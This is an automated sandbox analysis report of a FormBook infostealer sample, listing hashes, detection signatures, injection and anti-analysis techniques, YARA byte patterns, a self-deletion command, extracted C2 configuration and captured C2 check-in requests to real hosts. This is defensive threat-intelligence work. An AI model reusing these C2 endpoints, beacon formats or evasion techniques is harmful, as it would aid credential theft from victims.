Analysis Report TazxfJHRhq.exe

Overview

General Information

Sample Name: TazxfJHRhq.exe
Analysis ID: 383852
MD5: f818665dd48a93c48255d3ceadf92a6e
SHA1: 2567c8a3e1a3e3e98782ea8d0d117518ccd4291b
SHA256: 6bb8fa14bf9c650a67541ffedff2e3f1c055454b90489653c95aa39284d7eb92
Tags: exe, Formbook

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Contains functionality to prevent local Windows debugging
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses a Windows Living Off The Land Binaries (LOL bins)
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • TazxfJHRhq.exe (PID: 4736 cmdline: 'C:\Users\user\Desktop\TazxfJHRhq.exe' MD5: F818665DD48A93C48255D3CEADF92A6E)
    • TazxfJHRhq.exe (PID: 5940 cmdline: 'C:\Users\user\Desktop\TazxfJHRhq.exe' MD5: F818665DD48A93C48255D3CEADF92A6E)
      • explorer.exe (PID: 3388 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • cmstp.exe (PID: 4064 cmdline: C:\Windows\SysWOW64\cmstp.exe MD5: 4833E65ED211C7F118D4A11E6FB58A09)
          • cmd.exe (PID: 5948 cmdline: /c del 'C:\Users\user\Desktop\TazxfJHRhq.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 5320 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.autotrafficbot.com/evpn/"], "decoy": ["memoriesmade-l.com", "babypowah.com", "usinggroovefunnels.com", "qapjv.com", "kp031.com", "kinfet.com", "markmalls.com", "keithforemandesigns.com", "fydia.com", "jesussaysalllivesmatter.com", "sarachavesportela.com", "standerup.com", "monthlywifi.com", "productsoffholland.com", "newbieadvice.com", "globalnetworkautomation.com", "theholisticbirthco.com", "physicalrobot.com", "thesouthernhomesellers.com", "teamcounteract.com", "icomplementi.com", "jsmsheetmetal.com", "jcernadas.com", "del-tekzen.com", "alekseeva-center.info", "arunkapur.com", "gregismyrealestateagent.com", "soalfintech.com", "notrecondourbania.com", "alum2alum.network", "gototaku.com", "moneymakeideas.com", "dbdcontractlngllc.com", "tor-one.com", "walgreenlitigation.com", "votestephaniezarb.com", "washathome.club", "zhuledao.com", "sonyjewls.com", "oncologyacademe.com", "kuppers.info", "cgpizza.net", "glgshopbd.com", "dodson4tulare.com", "mishtifarmers.com", "a1-2c.com", "oligan-gs.com", "countrysidehomeinvestors.com", "bpro.swiss", "fodiyo.com", "playelementsgame.com", "melhorquesantander.com", "jamessicilia.com", "abundancewithmelissaharvey.com", "vatandoost.com", "curiosityisthecurebook.com", "o8y8.com", "de-knutselkeet.com", "advisorsonecall.com", "homerangeopen.com", "brusselsdesignproject.com", "0449888.com", "psychicsjaneholden.com", "b-sphere.com"]}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000001.00000002.248893172.00000000005C0000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security |
00000001.00000002.248893172.00000000005C0000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com |
  • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000001.00000002.248893172.00000000005C0000.00000040.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group |
  • 0x166b9:$sqlite3step: 68 34 1C 7B E1
  • 0x167cc:$sqlite3step: 68 34 1C 7B E1
  • 0x166e8:$sqlite3text: 68 38 2A 90 C5
  • 0x1680d:$sqlite3text: 68 38 2A 90 C5
  • 0x166fb:$sqlite3blob: 68 53 D8 7F 8C
  • 0x16823:$sqlite3blob: 68 53 D8 7F 8C
00000000.00000002.219806845.00000000027A0000.00000004.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security |
00000000.00000002.219806845.00000000027A0000.00000004.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com |
  • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Unpacked PEs

Source | Rule | Description | Author | Strings
0.2.TazxfJHRhq.exe.27a0000.4.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security |
0.2.TazxfJHRhq.exe.27a0000.4.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com |
  • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0.2.TazxfJHRhq.exe.27a0000.4.raw.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group |
  • 0x166b9:$sqlite3step: 68 34 1C 7B E1
  • 0x167cc:$sqlite3step: 68 34 1C 7B E1
  • 0x166e8:$sqlite3text: 68 38 2A 90 C5
  • 0x1680d:$sqlite3text: 68 38 2A 90 C5
  • 0x166fb:$sqlite3blob: 68 53 D8 7F 8C
  • 0x16823:$sqlite3blob: 68 53 D8 7F 8C
1.2.TazxfJHRhq.exe.400000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security |
1.2.TazxfJHRhq.exe.400000.0.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com |
  • 0x77e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x7b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x13895:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x13381:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x13997:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x13b0f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x859a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x125fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0x9312:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x18987:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x19a2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Sigma Overview

No Sigma rule has matched

Signature Overview

AV Detection:

Antivirus detection for URL or domain
Source: http://www.theholisticbirthco.com/evpn/?JDK8ix=x0ZJTajXylflf9w1AOLp4z6MEeP0j5bmDWx3E2oNmzw2lecwih58OZgaRC+Q9k1hI2JG&w4=jFNp36Ihu | Avira URL Cloud: Label: malware
Source: http://www.jcernadas.com/evpn/?JDK8ix=vuWMxfkh+6vmXF1oy+zIqCJtkAbujMYD9B0ur5oCOxuFSx86Hqk4MPW+e95bZxU45kLf&w4=jFNp36Ihu | Avira URL Cloud: Label: malware
Source: http://www.usinggroovefunnels.com/evpn/?JDK8ix=ISts4gbMhqyuTmKrSHZmognB97NvFE2BZp5yYtc0d8I84ULtNRTPjTWlODLK7CpkytNF&w4=jFNp36Ihu | Avira URL Cloud: Label: malware
Found malware configuration
Source: 00000001.00000002.248893172.00000000005C0000.00000040.00000001.sdmp | Malware Configuration Extractor: FormBook {"C2 list": ["www.autotrafficbot.com/evpn/"], "decoy": ["memoriesmade-l.com", "babypowah.com", "usinggroovefunnels.com", "qapjv.com", "kp031.com", "kinfet.com", "markmalls.com", "keithforemandesigns.com", "fydia.com", "jesussaysalllivesmatter.com", "sarachavesportela.com", "standerup.com", "monthlywifi.com", "productsoffholland.com", "newbieadvice.com", "globalnetworkautomation.com", "theholisticbirthco.com", "physicalrobot.com", "thesouthernhomesellers.com", "teamcounteract.com", "icomplementi.com", "jsmsheetmetal.com", "jcernadas.com", "del-tekzen.com", "alekseeva-center.info", "arunkapur.com", "gregismyrealestateagent.com", "soalfintech.com", "notrecondourbania.com", "alum2alum.network", "gototaku.com", "moneymakeideas.com", "dbdcontractlngllc.com", "tor-one.com", "walgreenlitigation.com", "votestephaniezarb.com", "washathome.club", "zhuledao.com", "sonyjewls.com", "oncologyacademe.com", "kuppers.info", "cgpizza.net", "glgshopbd.com", "dodson4tulare.com", "mishtifarmers.com", "a1-2c.com", "oligan-gs.com", "countrysidehomeinvestors.com", "bpro.swiss", "fodiyo.com", "playelementsgame.com", "melhorquesantander.com", "jamessicilia.com", "abundancewithmelissaharvey.com", "vatandoost.com", "curiosityisthecurebook.com", "o8y8.com", "de-knutselkeet.com", "advisorsonecall.com", "homerangeopen.com", "brusselsdesignproject.com", "0449888.com", "psychicsjaneholden.com", "b-sphere.com"]}
Multi AV Scanner detection for submitted file
Source: TazxfJHRhq.exe | Virustotal: Detection: 14%
Source: TazxfJHRhq.exe | ReversingLabs: Detection: 25%
Yara detected FormBook
Source: Yara match | File source: 00000001.00000002.248893172.00000000005C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.219806845.00000000027A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.475251727.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.476907995.0000000000C90000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000001.214771183.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.248915082.00000000005F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.248684354.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.476715752.0000000000930000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0.2.TazxfJHRhq.exe.27a0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.TazxfJHRhq.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.1.TazxfJHRhq.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.1.TazxfJHRhq.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.TazxfJHRhq.exe.27a0000.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.TazxfJHRhq.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: 1.2.TazxfJHRhq.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 4.2.cmstp.exe.4af7960.5.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: 1.1.TazxfJHRhq.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 0.2.TazxfJHRhq.exe.27a0000.4.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 4.2.cmstp.exe.6bd538.1.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: TazxfJHRhq.exe | Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: Binary string: cmstp.pdbGCTL source: TazxfJHRhq.exe, 00000001.00000002.248968735.0000000000629000.00000004.00000020.sdmp
Source: Binary string: wntdll.pdbUGP source: TazxfJHRhq.exe, 00000000.00000003.210529727.000000001EF00000.00000004.00000001.sdmp, TazxfJHRhq.exe, 00000001.00000002.249342255.0000000000B6F000.00000040.00000001.sdmp, cmstp.exe, 00000004.00000002.478158487.00000000045C0000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: TazxfJHRhq.exe, cmstp.exe
Source: Binary string: cmstp.pdb source: TazxfJHRhq.exe, 00000001.00000002.248968735.0000000000629000.00000004.00000020.sdmp
Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 0_2_00405301 DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA,
Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 0_2_00405C94 SetErrorMode,SetErrorMode,FindFirstFileA,SetErrorMode,FindClose,
Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 0_2_004026BC FindFirstFileA,
Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 4x nop then pop ebx
Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 4x nop then pop edi
Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 4x nop then pop ebx
Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 4x nop then pop edi
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4x nop then pop ebx
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4x nop then pop edi

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49745 -> 192.185.48.194:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49745 -> 192.185.48.194:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49745 -> 192.185.48.194:80
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49747 -> 52.58.78.16:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49747 -> 52.58.78.16:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49747 -> 52.58.78.16:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor | URLs: www.autotrafficbot.com/evpn/
Source: global traffic | HTTP traffic detected: GET /evpn/?JDK8ix=fhrZBjxaI0WDrOMMLB9i/eTcrXrQxugx+jgojm7BAd6fBe64JiOWliSCzfUjPirJzJCm&w4=jFNp36Ihu HTTP/1.1 | Host: www.jamessicilia.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /evpn/?JDK8ix=tTQY57yJV1PB58vhZsfw1idcR39uzoBhuFhBLA0LfuUY3fYfkSmldauzSZkrcgPEdi+f&w4=jFNp36Ihu HTTP/1.1 | Host: www.kinfet.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /evpn/?JDK8ix=0M6ZQgL8IcDyCwomro3oU0+S4lgLLFgc0WEYasg9Je1ZokoU9qr9vbqVIYlP2JKTB372&w4=jFNp36Ihu HTTP/1.1 | Host: www.productsoffholland.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /evpn/?JDK8ix=KkWhScBkby78tLALzdAz8CnCjb47jVkq+/iIMgqrMbFUrtE+6VX7P3g+12tQT1WZakud&w4=jFNp36Ihu HTTP/1.1 | Host: www.markmalls.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /evpn/?JDK8ix=eugAyVbFjTGCbHTU5QCJaxOKGF+rVHXRgES2jcHdoUQlFxVgByKSQwjGascFDT08oG3Y&w4=jFNp36Ihu HTTP/1.1 | Host: www.zhuledao.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /evpn/?JDK8ix=vuWMxfkh+6vmXF1oy+zIqCJtkAbujMYD9B0ur5oCOxuFSx86Hqk4MPW+e95bZxU45kLf&w4=jFNp36Ihu HTTP/1.1 | Host: www.jcernadas.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /evpn/?JDK8ix=x0ZJTajXylflf9w1AOLp4z6MEeP0j5bmDWx3E2oNmzw2lecwih58OZgaRC+Q9k1hI2JG&w4=jFNp36Ihu HTTP/1.1 | Host: www.theholisticbirthco.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /evpn/?JDK8ix=MYo3qtR4MoTJM9eEEEQJY+2owLrirHbqorePLbwYxji+asNtirv2kfx8Flc200WiuFJj&w4=jFNp36Ihu HTTP/1.1 | Host: www.tor-one.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /evpn/?JDK8ix=SbzT885gMwI0SrecOCVR7+X63g3QiQnq4cO3Mq/wdHuk7Bui5+S2HJ4sI04qlEXUDlVA&w4=jFNp36Ihu HTTP/1.1 | Host: www.de-knutselkeet.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /evpn/?JDK8ix=rbKZoqFNxKUJa45rmf723j5e1+/Af1Vmd22uFdYYwCe+W7Lpy/kHCEK0lxAuMCiY39Cm&w4=jFNp36Ihu HTTP/1.1 | Host: www.autotrafficbot.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /evpn/?JDK8ix=lIAMQw8Bc5WvbtZzc5MVHUptsiPc1Sl8tBJqhUvlbuUAA7ypaYYvmQWduCHy/+CL3sQ0&w4=jFNp36Ihu HTTP/1.1 | Host: www.curiosityisthecurebook.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /evpn/?JDK8ix=ISts4gbMhqyuTmKrSHZmognB97NvFE2BZp5yYtc0d8I84ULtNRTPjTWlODLK7CpkytNF&w4=jFNp36Ihu HTTP/1.1 | Host: www.usinggroovefunnels.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /evpn/?JDK8ix=uC/MtWgv+YrXZeFWxw8c+UMLGaJCPPY/UiwLcWwP6A/e3Dk62IKxdmGhKI0+YBSelN0N&w4=jFNp36Ihu HTTP/1.1 | Host: www.cgpizza.net | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /evpn/?JDK8ix=mJ1WicGgYxGiPfNmi48PwwH9NxkuMiIXMjFvraRfIBMfYxjrtIxgIRAmB9RzgRW7JS2o&w4=jFNp36Ihu HTTP/1.1 | Host: www.physicalrobot.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /evpn/?JDK8ix=fhrZBjxaI0WDrOMMLB9i/eTcrXrQxugx+jgojm7BAd6fBe64JiOWliSCzfUjPirJzJCm&w4=jFNp36Ihu HTTP/1.1 | Host: www.jamessicilia.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /evpn/?JDK8ix=tTQY57yJV1PB58vhZsfw1idcR39uzoBhuFhBLA0LfuUY3fYfkSmldauzSZkrcgPEdi+f&w4=jFNp36Ihu HTTP/1.1 | Host: www.kinfet.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: Joe Sandbox View | IP Address: 52.58.78.16 52.58.78.16
Source: Joe Sandbox View | ASN Name: AMAZON-02US AMAZON-02US
Source: Joe Sandbox View | ASN Name: GD-EMEA-DC-CGN1DE GD-EMEA-DC-CGN1DE
Source: Joe Sandbox View | ASN Name: ANONYMIZEEpikNetworkCH ANONYMIZEEpikNetworkCH
Source: unknown | DNS traffic detected: queries for: www.jamessicilia.com
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Thu, 08 Apr 2021 09:10:22 GMT | Content-Type: text/html | Content-Length: 153 | Connection: close | Server: nginx/1.16.1 | Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a | Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.16.1</center></body></html>
Source: cmstp.exe, 00000004.00000002.479835773.0000000004C72000.00000004.00000001.sdmp | String found in binary or memory: http://bitly.ws/9qZUevpn/?JDK8ix=ISts4gbMhqyuTmKrSHZmognB97NvFE2BZp5yYtc0d8I84ULtNRTPjTWlODLK7CpkytN
Source: explorer.exe, 00000003.00000000.237042288.000000000F674000.00000004.00000001.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: explorer.exe, 00000003.00000000.233379152.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://fontfabrik.com
Source: explorer.exe, 00000003.00000000.233379152.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000003.00000000.233379152.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000003.00000000.233379152.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000003.00000000.233379152.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 00000003.00000000.233379152.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 00000003.00000000.233379152.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 00000003.00000000.233379152.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: explorer.exe, 00000003.00000000.233379152.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 00000003.00000000.233379152.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 00000003.00000000.233379152.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 00000003.00000000.233379152.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000003.00000000.233379152.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000003.00000000.233379152.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000003.00000000.233379152.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000003.00000000.233379152.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 00000003.00000000.233379152.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 00000003.00000000.233379152.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000003.00000000.233379152.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: cmstp.exe, 00000004.00000002.479835773.0000000004C72000.00000004.00000001.sdmp | String found in binary or memory: http://www.physicalrobot.com
Source: cmstp.exe, 00000004.00000002.479835773.0000000004C72000.00000004.00000001.sdmp | String found in binary or memory: http://www.physicalrobot.com/
Source: explorer.exe, 00000003.00000000.233379152.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000003.00000000.233379152.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000003.00000000.233379152.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000003.00000000.233379152.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000003.00000000.233379152.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000003.00000000.233379152.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 00000003.00000000.233379152.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.zhongyicts.com.cn
Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 0_2_00404EA0 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,lstrlenA,GlobalUnlock,SetClipboardData,CloseClipboard,

E-Banking Fraud:

Yara detected FormBook
Source: Yara match | File source: 00000001.00000002.248893172.00000000005C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.219806845.00000000027A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.475251727.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.476907995.0000000000C90000.00000004.00000001.sdmp, type: MEMORY
